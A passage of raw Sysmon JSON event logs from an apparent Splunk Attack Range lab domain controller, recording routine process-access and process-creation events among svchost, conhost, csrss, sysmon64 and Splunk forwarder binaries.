07:56:43.991","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4045,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:43.991\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-203B-5F25-0000-0010AD100600}\r\nTargetProcessId: 4552\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:43.991","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-203B-5F25-0000-0010AD100600}","TargetProcessId":"4552","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4046,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:44.116\r\nSourceProcessGUID: {41C8662E-203B-5F25-0000-0010AD100600}\r\nSourceProcessId: 4552\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:44.116","SourceProcessGUID":"{41C8662E-203B-5F25-0000-0010AD100600}","SourceProcessId":"4552","SourceThreadId":"3796","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4047,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:44.664\r\nProcessGuid: {41C8662E-203C-5F25-0000-00105A120600}\r\nProcessId: 1328\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:56:44.664","ProcessGuid":"{41C8662E-203C-5F25-0000-00105A120600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:56:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4048,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:44.663\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-203C-5F25-0000-00105A120600}\r\nTargetProcessId: 1328\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:44.663","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-203C-5F25-0000-00105A120600}","TargetProcessId":"1328","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4049,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:44.663\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-203C-5F25-0000-00105A120600}\r\nTargetProcessId: 1328\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:44.663","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-203C-5F25-0000-00105A120600}","TargetProcessId":"1328","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:56:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4050,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:44.663\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:44.663","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4051,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:44.663\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:44.663","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4052,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:44.663\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:44.663","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4053,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:44.663\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 